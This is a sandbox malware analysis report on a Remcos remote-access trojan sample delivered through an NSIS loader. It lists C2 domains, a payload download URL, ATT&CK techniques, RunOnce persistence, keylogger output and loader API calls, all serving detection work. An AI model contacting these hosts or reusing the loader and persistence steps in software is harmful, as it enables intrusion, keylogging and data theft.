              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-3DX9QWJump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000004.00000002.2910026299.00000000354EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2890396068.0000000004F17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe PID: 1076, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Native API              		1
              Registry Run Keys / Startup Folder              		1
              Access Token Manipulation              		1
              Masquerading              		11
              Input Capture              		31
              Security Software Discovery              		Remote Services11
              Input Capture              		11
              Encrypted Channel              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading              		12
              Process Injection              		2
              Virtualization/Sandbox Evasion              		LSASS Memory2
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol1
              Archive Collected Data              		1
              Remote Access Software              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              Registry Run Keys / Startup Folder              		1
              Access Token Manipulation              		Security Account Manager1
              Process Discovery              		SMB/Windows Admin Shares1
              Clipboard Data              		1
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              DLL Side-Loading              		12
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets2
              File and Directory Discovery              		SSHKeylogging213
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Obfuscated Files or Information              		Cached Domain Credentials23
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              IMG635673567357735773573757875883587935775753Bjlkeloftet.exe29%ReversingLabsWin32.Backdoor.Remcos
              IMG635673567357735773573757875883587935775753Bjlkeloftet.exe16%VirustotalBrowse
              IMG635673567357735773573757875883587935775753Bjlkeloftet.exe100%AviraHEUR/AGEN.1337950

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\subfolder1\Vaskegthed.exe100%AviraHEUR/AGEN.1337950
              C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\subfolder1\Vaskegthed.exe29%ReversingLabsWin32.Backdoor.Remcos

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              odumeje.duckdns.org2%VirustotalBrowse
              odumegwu.duckdns.org1%VirustotalBrowse
              bdias.com0%VirustotalBrowse
              odumeje1.duckdns.org2%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              odumeje.duckdns.org0%Avira URL Cloudsafe
              https://bdias.com/zjMSeQNkb41.bin20%Avira URL Cloudsafe
              https://bdias.com/zjMSeQNkb41.bin/0%Avira URL Cloudsafe
              https://bdias.com/0%Avira URL Cloudsafe
              http://bdias.com/zjMSeQNkb41.binm0%Avira URL Cloudsafe
              https://bdias.com/zjMSeQNkb41.bin0%Avira URL Cloudsafe
              http://bdias.com/zjMSeQNkb41.bin0%Avira URL Cloudsafe
              odumegwu.duckdns.org0%Avira URL Cloudsafe
              http://bdias.com/zjMSeQNkb41.bine0%Avira URL Cloudsafe
              odumeje1.duckdns.org0%Avira URL Cloudsafe
              http://bdias.com/zjMSeQNkb41.binj0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              odumeje.duckdns.org
              		192.169.69.26
              		truetrueunknown
              odumegwu.duckdns.org
              		192.169.69.26
              		truetrueunknown
              bdias.com
              		91.196.125.125
              		truefalseunknown
              odumeje1.duckdns.org
              		192.169.69.26
              		truetrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              odumeje.duckdns.orgtrue
              • Avira URL Cloud: safe
              		unknown
              https://bdias.com/zjMSeQNkb41.binfalse
              • Avira URL Cloud: safe
              		unknown
              http://bdias.com/zjMSeQNkb41.binfalse
              • Avira URL Cloud: safe
              		unknown
              odumegwu.duckdns.orgtrue
              • Avira URL Cloud: safe
              		unknown
              odumeje1.duckdns.orgtrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nsis.sf.net/NSIS_ErrorIMG635673567357735773573757875883587935775753Bjlkeloftet.exe, Vaskegthed.exe.4.drfalse
                		high
                https://bdias.com/zjMSeQNkb41.bin2IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004F17000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://bdias.com/zjMSeQNkb41.bin/IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://bdias.com/IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://bdias.com/zjMSeQNkb41.binmIMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://nsis.sf.net/NSIS_ErrorErrorIMG635673567357735773573757875883587935775753Bjlkeloftet.exe, Vaskegthed.exe.4.drfalse
                  		high
                  http://bdias.com/zjMSeQNkb41.bineIMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://bdias.com/zjMSeQNkb41.binjIMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004F17000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  192.169.69.26
                  		odumeje.duckdns.orgUnited States
                  		23033WOWUStrue
                  91.196.125.125
                  		bdias.comBulgaria
                  		201200SUPERHOSTING_ASBGfalse

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1554912
                  Start date and time:2024-11-13 08:17:07 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 6m 11s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:6
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@3/14@8/2
                  EGA Information:
                  • Successful, ratio: 50%
                  HCA Information:
                  • Successful, ratio: 88%
                  • Number of executed functions: 46
                  • Number of non-executed functions: 62
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, PID 1076 because there are no executed function
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  02:19:30API Interceptor210x Sleep call for process: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe modified
                  07:18:53AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Vaskegthed.exe
                  07:19:01AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Vaskegthed.exe

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  192.169.69.26SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                  • yuya0415.duckdns.org:1928/Vre
                  confirmaci#U00f3n y correcci#U00f3n de la direcci#U00f3n de entrega.vbsGet hashmaliciousUnknownBrowse
                  • servidorarquivos.duckdns.org/e/e
                  oKtkBYZMWl.exeGet hashmaliciousUnknownBrowse
                  • csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
                  oKtkBYZMWl.exeGet hashmaliciousUnknownBrowse
                  • csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
                  http://yvtplhuqem.duckdns.org/ja/Get hashmaliciousUnknownBrowse
                  • yvtplhuqem.duckdns.org/ja/
                  http://fqqqffcydg.duckdns.org/en/Get hashmaliciousUnknownBrowse
                  • fqqqffcydg.duckdns.org/en/
                  http://yugdzvsqnf.duckdns.org/en/Get hashmaliciousUnknownBrowse
                  • yugdzvsqnf.duckdns.org/en/
                  &nuevo_pedido#..vbsGet hashmaliciousUnknownBrowse
                  • servidorarquivos.duckdns.org/e/e
                  transferencia_Hsbc.xlsxGet hashmaliciousUnknownBrowse
                  • servidorarquivos.duckdns.org/e/e
                  http://www.secure-0fflce-o365.duckdns.org/Get hashmaliciousUnknownBrowse
                  • www.secure-0fflce-o365.duckdns.org/

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  odumegwu.duckdns.orgCEBI_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 143.244.46.150
                  rIMGCY46473567583458675867864894698467458.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 143.244.46.150

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  SUPERHOSTING_ASBG0GuwV0t2UU.exeGet hashmaliciousFormBook, GuLoaderBrowse
                  • 193.107.36.30
                  0GuwV0t2UU.exeGet hashmaliciousFormBook, GuLoaderBrowse
                  • 193.107.36.30
                  Rob.Kuster@stonhard.com.zipGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                  • 185.45.66.155
                  zip file.zipGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                  • 185.45.66.155
                  450707124374000811.exeGet hashmaliciousGuLoaderBrowse
                  • 193.107.36.30
                  450707124374000811.exeGet hashmaliciousGuLoaderBrowse
                  • 193.107.36.30
                  3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                  • 193.107.36.30
                  3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                  • 193.107.36.30
                  Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                  • 193.107.36.30
                  Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                  • 193.107.36.30
                  WOWUSdceafff25f376bd3883f15c500fbfe369b45821fdbb0e.exeGet hashmaliciousNanocoreBrowse
                  • 192.169.69.26
                  qy8i3kM2Ir.exeGet hashmaliciousGuLoader, RemcosBrowse
                  • 192.169.69.26
                  Switzerland Clients Pax4.exeGet hashmaliciousRemcosBrowse
                  • 192.169.69.26
                  D786UcYWOs.exeGet hashmaliciousRemcosBrowse
                  • 192.169.69.26
                  Qc238InLS3.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 192.169.69.26
                  17308803849407ff3cbe5ee21edb8fae9eea59dcec4bd1d0263a367346f607736e04b16058533.dat-decoded.exeGet hashmaliciousRemcosBrowse
                  • 192.169.69.26
                  1730880186ecae67588d8fe3bd5f8e7a4af4400ff7eccf3ad632a155a62b884ab04b24e2a4635.dat-decoded.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                  • 192.169.69.26
                  CDT.ps1Get hashmaliciousAsyncRATBrowse
                  • 192.169.69.26
                  Reservation Detail Booking.com ID.batGet hashmaliciousAsyncRATBrowse
                  • 192.169.69.26
                  17305370455ddd9f41fcc9d1469d95fbed5a87a8d85a167a3e72e33b51453c780336bca79f314.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                  • 192.169.69.26

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  37f463bf4616ecd445d4a1937da06e19fefbBqMKcU.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                  • 91.196.125.125
                  yh5At5T1Zs.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                  • 91.196.125.125
                  #U017diados#U0165 o cenov#U00fa ponuku_11-12-2024#U00b7pdf.vbsGet hashmaliciousGuLoaderBrowse
                  • 91.196.125.125
                  Solicitud de presupuesto 12-11-2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 91.196.125.125
                  Document BT24#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 91.196.125.125
                  nvxdbat.dll.dllGet hashmaliciousLatrodectusBrowse
                  • 91.196.125.125
                  63#U2467.htaGet hashmaliciousUnknownBrowse
                  • 91.196.125.125
                  DEMASI-24-12B DOC. SCAN.exeGet hashmaliciousGuLoader, RemcosBrowse
                  • 91.196.125.125
                  SK #Uacac#Uc801#Uc694#Uccad_#Uc6b8#Uc0b0#Uacf5#Uc7a5#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 91.196.125.125
                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                  • 91.196.125.125

                  Dropped Files

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dllCEBI Order_ tlumaczenie dokumentow dostawy do CEBI PL11.10.24Frakoblet.exeGet hashmaliciousRemcosBrowse
                    DEMASI-24-12B DOC. SCAN.exeGet hashmaliciousGuLoader, RemcosBrowse
                      CEBI_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        rIMGCY46473567583458675867864894698467458.exeGet hashmaliciousRemcos, GuLoaderBrowse
                          RAINBOW_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exeGet hashmaliciousGuLoader, RemcosBrowse
                            rNuevo_Pedido_129149.exeGet hashmaliciousGuLoaderBrowse
                              rNuevo_Pedido_129149.exeGet hashmaliciousGuLoaderBrowse
                                zamowienie.exeGet hashmaliciousGuLoaderBrowse
                                  zamowienie.exeGet hashmaliciousGuLoaderBrowse
                                    HJEbEB40vP.exeGet hashmaliciousGuLoaderBrowse

                                      Created / dropped Files

                                      C:\ProgramData\remcos\logs.dat

                                      Download File
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):156
                                      Entropy (8bit):3.400722866085902
                                      Encrypted:false
                                      SSDEEP:3:rhlKlfQlfVlPUlfKld4b5JWRal2Jl+7R0DAlBG45klovDl6ALilXl:6lfQlHslClCb5YcIeeDAlOWAAe3
                                      MD5:A4D4150BC786E9F3964B57011A3C02A8
                                      SHA1:D9AA7CC1054A819579F3A4DD60884441ACE5D062
                                      SHA-256:C55BCFD354EB570B7CA86541FF69FD7C42057C770C7764F9DAE8E0615AA62E6D
                                      SHA-512:7225E233DD2CAD86B6CE7AAEC377ADC207A6E3ED3A9423FFDBB4071DB550A3CFC230233FE204F3FDC193BC32F290417C50F05A24360498E9BEC8168280E840F5
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                      Reputation:low
                                      Preview:....[.2.0.2.4./.1.1./.1.3. .0.2.:.1.8.:.5.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.

                                      C:\Users\user\AppData\Local\Temp\nsb535E.tmp

                                      Download File
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):56
                                      Entropy (8bit):4.250903860294566
                                      Encrypted:false
                                      SSDEEP:3:sAAEVvjsiD84n:fLb
                                      MD5:5974087856E59BA1B1D228E39D15591A
                                      SHA1:43555CD275094990A54289FCA083E1F9E14AB8C7
                                      SHA-256:9D118DC7D563043A8EC352F7112AF2EAC3EBFFD11258E4924533FF4FD00BB771
                                      SHA-512:876D36CB1B3A22CD0686D04FD0830B7C15B67C4003D9C2CD67496D3F726B72544E64F9CD94BCD951C8EBA9E74CB1E2AAA0638552FD82BC5BDB547A6E28950082
                                      Malicious:false
                                      Reputation:low
                                      Preview:kernel32::ReadFile(i r5, i r1, i 58015744,*i 0, i 0)i.r3

                                      C:\Users\user\AppData\Local\Temp\nsb53FB.tmp

                                      Download File
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):30
                                      Entropy (8bit):4.256564762130954
                                      Encrypted:false
                                      SSDEEP:3:DyWgLQIfLBJXmgU:mkIP25
                                      MD5:F15BFDEBB2DF02D02C8491BDE1B4E9BD
                                      SHA1:93BD46F57C3316C27CAD2605DDF81D6C0BDE9301
                                      SHA-256:C87F2FF45BB530577FB8856DF1760EDAF1060AE4EE2934B17FDD21B7D116F043
                                      SHA-512:1757ED4AE4D47D0C839511C18BE5D75796224D4A3049E2D8853650ACE2C5057C42040DE6450BF90DD4969862E9EBB420CD8A34F8DD9C970779ED2E5459E8F2F1
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:user32::EnumWindows(i r1 ,i 0)

                                      C:\Users\user\AppData\Local\Temp\nsg52E0.tmp

                                      Download File
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.483822629187616
                                      Encrypted:false
                                      SSDEEP:3:sEMBQEJkJVEjDzdWxQoXUn:UWxvUn
                                      MD5:953EC092C39A753076F7BA3888679925
                                      SHA1:A658DB8C80E2175C08E026D20AE06DACDFC7E100
                                      SHA-256:46D1E26793406453E0DF203BBBF7A964247E33DC6C5A9D842A41ACEE70755E9D
                                      SHA-512:EA1730869E58239FD68489649305D5324DAC06ECC00B4F19BD4DC4C4138865F7A5948307FA33B6E69136B20B4D934E2EC01B8A7CD75F056E09FE738F0CA27C39
                                      Malicious:false
                                      Reputation:low
                                      Preview:kernel32::VirtualAlloc(i 0,i 58015744, i 0x3000, i 0x40)p.r1

                                      C:\Users\user\AppData\Local\Temp\nsp50AC.tmp

                                      Download File
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):52
                                      Entropy (8bit):4.0914493934217315
                                      Encrypted:false
                                      SSDEEP:3:sBa99k1NoCFOn:KankVg
                                      MD5:5D04A35D3950677049C7A0CF17E37125
                                      SHA1:CAFDD49A953864F83D387774B39B2657A253470F
                                      SHA-256:A9493973DD293917F3EBB932AB255F8CAC40121707548DE100D5969956BB1266
                                      SHA-512:C7B1AFD95299C0712BDBC67F9D2714926D6EC9F71909AF615AFFC400D8D2216AB76F6AC35057088836435DE36E919507E1B25BE87B07C911083F964EB67E003B
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:kernel32::SetFilePointer(i r5, i 1200 , i 0,i 0)i.r3

                                      C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll

                                      Download File
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):12288
                                      Entropy (8bit):5.744994954995265
                                      Encrypted:false
                                      SSDEEP:192:gFiQJ77pJp17C8F1A5xjGNxrgFOgb7lrT/nC93:E7pJp48F2exrg5F/C
                                      MD5:12B140583E3273EE1F65016BECEA58C4
                                      SHA1:92DF24D11797FEFD2E1F8D29BE9DFD67C56C1ADA
                                      SHA-256:014F1DFEB842CF7265A3644BC6903C592ABE9049BFC7396829172D3D72C4D042
                                      SHA-512:49FFDFA1941361430B6ACB3555FD3AA05E4120F28CBDF7CEAA2AF5937D0B8CCCD84471CF63F06F97CF203B4AA20F226BDAD082E9421B8E6B62AB6E1E9FC1E68A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Joe Sandbox View:
                                      • Filename: CEBI Order_ tlumaczenie dokumentow dostawy do CEBI PL11.10.24Frakoblet.exe, Detection: malicious, Browse
                                      • Filename: DEMASI-24-12B DOC. SCAN.exe, Detection: malicious, Browse
                                      • Filename: CEBI_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exe, Detection: malicious, Browse
                                      • Filename: rIMGCY46473567583458675867864894698467458.exe, Detection: malicious, Browse
                                      • Filename: RAINBOW_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exe, Detection: malicious, Browse
                                      • Filename: rNuevo_Pedido_129149.exe, Detection: malicious, Browse
                                      • Filename: rNuevo_Pedido_129149.exe, Detection: malicious, Browse
                                      • Filename: zamowienie.exe, Detection: malicious, Browse
                                      • Filename: zamowienie.exe, Detection: malicious, Browse
                                      • Filename: HJEbEB40vP.exe, Detection: malicious, Browse
                                      Reputation:moderate, very likely benign file
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L....C.f...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...h....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\nsz4EC6.tmp

                                      Download File
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):74
                                      Entropy (8bit):3.9637832956585757
                                      Encrypted:false
                                      SSDEEP:3:sRQE1wFEt/ijNJyI3dj2+n:aQEGiwh3D
                                      MD5:16D513397F3C1F8334E8F3E4FC49828F
                                      SHA1:4EE15AFCA81CA6A13AF4E38240099B730D6931F0
                                      SHA-256:D3C781A1855C8A70F5ACA88D9E2C92AFFFA80541334731F62CAA9494AA8A0C36
                                      SHA-512:4A350B790FDD2FE957E9AB48D5969B217AB19FC7F93F3774F1121A5F140FF9A9EAAA8FA30E06A9EF40AD776E698C2E65A05323C3ADF84271DA1716E75F5183C3
                                      Malicious:false
                                      Preview:kernel32::CreateFileA(m r4 , i 0x80000000, i 0, p 0, i 4, i 0x80, i 0)i.r5

                                      C:\Users\user\AppData\Local\Temp\subfolder1\Vaskegthed.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Category:dropped
                                      Size (bytes):731660
                                      Entropy (8bit):7.930916861083211
                                      Encrypted:false
                                      SSDEEP:12288:E3cAEjowqtlkCSN+RgfcWNQDw9HSAcQ4A5uKrQrxco0+tNADhZebeEkOP:E3cAEjowDCC+R7ab9HSzJWoV07fDW
                                      MD5:A03DCB82D6ECAAB34CC6AE971A806C06
                                      SHA1:3BF367387AD278B154BD2AF42E7BEDF0F8676F6C
                                      SHA-256:4FC786009AD36DED81DFBD863802B06436B718112C35A505D447F6E0D31CBF8D
                                      SHA-512:A11A2C0E59CD229D6D8DE8EDB4322CA434E5931EF94BB1CF4C5435E891125CA8C0518A675277C36936FF47E71EAB7954CE17AAA36ABB0109CBF84087E9652352
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 29%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..F..F..F.*....F..G.w.F.*....F..v..F...@..F.Rich.F.........PE..L....C.f.................h...x.......3............@.......................................@.................................<........0...............................................................................................................text....f.......h.................. ..`.rdata..@............l..............@..@.data...8Q..........................@....ndata...0...............................rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate\Bryggerheste128.lyd

                                      Download File
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):70484
                                      Entropy (8bit):1.2548606107026976
                                      Encrypted:false
                                      SSDEEP:384:lVBk+mR+atFzygIkeailVBDgEmFUUbuTKZGxjRTtzj3ZkyK+8S11cFgQ65dot:Z++arrkavEmEgORTt3ms8Emd/
                                      MD5:798AB22DA8AE95CED1F8739AF1A02DCC
                                      SHA1:8426A4170A177A4A0C4C426DC5A9AC4701E4E121
                                      SHA-256:432BF73DB986527C23F8CCA77B14EB4EF071D72EBDD6EEEFA9CA79DFF48049E6
                                      SHA-512:2B661375F22A3547DE746483078E1AE58EC01D57DE322C995C72ADE9013FEED8CA6FEC360B2A1DFB2050E0F35EB603161EFD6D0CB64B43EEF9D00CDC19849C9C
                                      Malicious:false
                                      Preview:L...................................................j.............................m.........6.................l...........................................Q......................;...................................................t...................6......`..............".........................$.............^.....................L................................................/$...9...............................7.....................{............................................................*.............1...................................?..............&..V.......................................b......................................,.......X......................................................................................................!..............x.................q......................................?.............................N..:....................J.......$........3..................................z..9.........................................................

                                      C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate\Herkomsts.Bre

                                      Download File
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):136260
                                      Entropy (8bit):4.597341085882072
                                      Encrypted:false
                                      SSDEEP:3072:UFVF0JHPi5oGXoKZiTd6Rsadh2e+4dcvdN:OVaJHPi7/s8hb+FN
                                      MD5:36F112976788D4FB05E4649672BBACEC
                                      SHA1:9D3180DB01A7D2F6F76B941EF2D6080ADBE15B62
                                      SHA-256:2B2742E30B5D567B7132CA555865C129AD6C62820E2DF847247BE761DA8C586B
                                      SHA-512:0F6F5B01463AF91D9772E83C950948856F25FBEB32145C7567B5DBBFC43B8E4D7101EB0383F8262203CF9C0598C88DC42B08C0D6E9875A1BFDE666E66591022B
                                      Malicious:false
